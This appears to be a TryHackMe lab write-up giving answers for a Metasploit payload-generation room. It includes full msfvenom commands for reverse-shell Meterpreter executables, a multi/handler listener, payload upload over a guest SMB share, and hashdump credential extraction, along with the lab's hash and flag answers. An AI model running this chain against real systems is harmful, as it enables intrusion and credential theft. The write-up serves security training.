General
TryHackMe Metasploit: Payload Generation Room Writeup
Efe Kırbaş DEV Community 周榜
2 views
TASK 2
What flag sets the output format in msfvenom?
Answer: -f
What flag specifies the payload to generate?
Answer: -p
TASK 3
Which payload type is self-contained and does not require a second download: staged or stageless?
In the introduction to the text, "stageless payloads" are defined directly as follows:
In contrast, it is noted that staged payloads operate in two stages and that the main component (stage) must be downloaded via the handler in the second stage:
"The Trade-Offs" Table:
The "Reliability" row of the table contains the following statement for "stageless":
"Generating Both with Msfvenom" Section:
The comparison in the text clearly reiterates that the stageless payload does not require an additional download:
Answer: stageless
TASK 4
What output format would you use to generate a Linux binary executable?
Answer: elf
Write the full msfvenom command to generate a stageless Windows x64 Meterpreter reverse TCP payload as an executable file named backdoor.exe, connecting back to 10.10.14.12 on port 5555.
Answer: msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.12 LPORT=5555 -f exe -o backdoor.exe
TASK 5
What is the name of the most well-known Metasploit encoder?
Answer: x86/shikata_ga_nai
What msfvenom flag specifies characters that must not appear in the payload output?
Answer: -b
TASK 6
What msfvenom flag injects a payload into an existing executable template?
Answer: -x
TASK 7
What Metasploit module is used as a universal listener for catching reverse shell connections?
Answer: exploit/multi/handler
What handler option should you set to false if you want the handler to keep listening after the first session is established?
Answer: ExitOnSession
TASK 8
Open the AttackBox terminal and enter your own IP address (ip a or tun0 / AttackBox IP) to generate the payload:
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=(Enter your ATTACKBOX_IP here) LPORT=80 -f exe -o shell.exe
Now let's set up the listener and upload the file to the target machine:
Verification: You should see that the terminal line changes to msf6 >.
In the console window that opens, enter the following commands in order:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_http
set LHOST 10.113.112.158
set LPORT 80
run -j
Now, Type the following command into the console
use auxiliary/admin/smb/upload_file
Verification: You should see that the command line has changed to msf6 auxiliary(admin/smb/upload_file) >.
Enter the following commands in order (replace LAB_MACHINE_IP with the target machine's IP address provided on the TryHackMe page):
set RHOSTS
set SMBUSER guest
set SMBSHARE public
et LPATH /root/shell.exe
set RPATH shell.exe
run
To retrieve the hash and flag values from the questions, follow the steps below in order:
Enter the following command in the console:
sessions -i 1
The command line will change to "meterpreter >".
Get Jim's NTLM Hash
Type the following on that meterpreter > line:
hashdump
The line structure in the hashdump output is as follows:
username : RID : LM_hash : NTLM_hash :::
That's why we're looking for the NTLM_hash
Answer: 1e3fe826df1e5af582a98c034cafa9f4
Find the flag somewhere in C:\Users\Administrator. What's its value?
Let's do a simple search with this command
search -d "C:\\Users\\Administrator" -f *flag*
We found flag.txt in the Documents folder
lLet's wrap this up:
cat C:\Users\Administrator\Documents\flag.txt
Answer: THM{capst0ne_pwn3d_v1a_writable_share}
Thank you for reading room is completed. ^^
Read original: https://dev.to/efek/metasploit-payload-generation-room-writeup-9nh
← Previous
My privacy scan found 412 leaks. 374 of them were one line of my own tooling.
Next →
My freshness check went stale every time someone did the right thing
Related
I Finally Built My Developer Portfolio
General
3
Dev.to (EN Zone)
My checker blamed the other tool, and the defect was in the one doing the blaming
General
3
DEV Community 周榜
I added three new checks and ten unrelated tests went red. That was the system working.
General
5
DEV Community
Full Disk Access Was On, and macOS Still Refused the App
General
5
DEV Community 周榜
Comments0
No comments yet — be the first